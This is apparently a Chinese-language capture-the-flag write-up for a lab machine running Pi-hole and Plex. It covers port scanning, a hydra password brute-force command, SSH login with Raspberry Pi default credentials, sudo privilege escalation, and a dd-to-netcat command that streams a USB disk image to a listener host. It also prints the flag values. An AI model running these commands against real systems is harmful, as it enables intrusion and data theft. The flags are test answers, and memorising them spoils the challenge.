Recon

  • http://10.129.214.20/首頁是空ㄉ
  • Rustscan- nmap- nmap -A -p22,53,80,2000,32400,32469 10.129.214.20dirsearch 掃目錄- 32400 Port 跑了一個 PLEX- Pi-Hole 在 :80/admin-
  • https://www.exploit-db.com/exploits/48442需要密碼才能 RCEdnsmasq Exploit
    https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py

爆破密碼

  • hydra -l '' -P /opt/wordlists/rockyou.txt 10.129.214.20 http-post-form "/admin/index.php?login:pw=^PASS^:Forgot password"
  • 跑了很久都沒有,應該不是 QQ

Exploit

  • 看到 Pi-Hole 又有 PLEX 影音伺服器猜他是樹梅派所以 pi 預設帳密- pi / raspberrySSH-
  • 好無聊 = =取得 User Flag- ff837707441b257a20e32199d7c8838d

提權

  • 起手式 sudo -l
  • 發現可以直接變 root

數位鑑識

  • 取 root flag
  • 搞事ㄛ = =確認外接裝置- 到隨身碟裡找東西-
  • 詹姆斯在搞ㄛ = =直接暴力解- strings 硬碟
  • 3d3e483143ff12ec505d026fa13e020b暴力解也可以傳回本地處理- 本地監聽 nc -l 1234 > usbstick.dump
  • 遠端用 dd 把資料丟出來sudo dd if=/dev/sdb | nc -w3 10.10.16.35 1234

嘗試失敗的方法 (Testdisk)

  • 使用 Testdisk 還原https://blog.gtwang.org/linux/testdisk-linux-recover-deleted-files/用 scp 傳過去- 解壓縮- 用 sudo 執行- 選定硬碟 sdb- 預設沒有分割區- 選擇格式- 找到刪除的 root.txt-
  • 選到 root.txt 按 C
  • 選存檔位置-
  • 但這樣出來的檔案是空的 QQ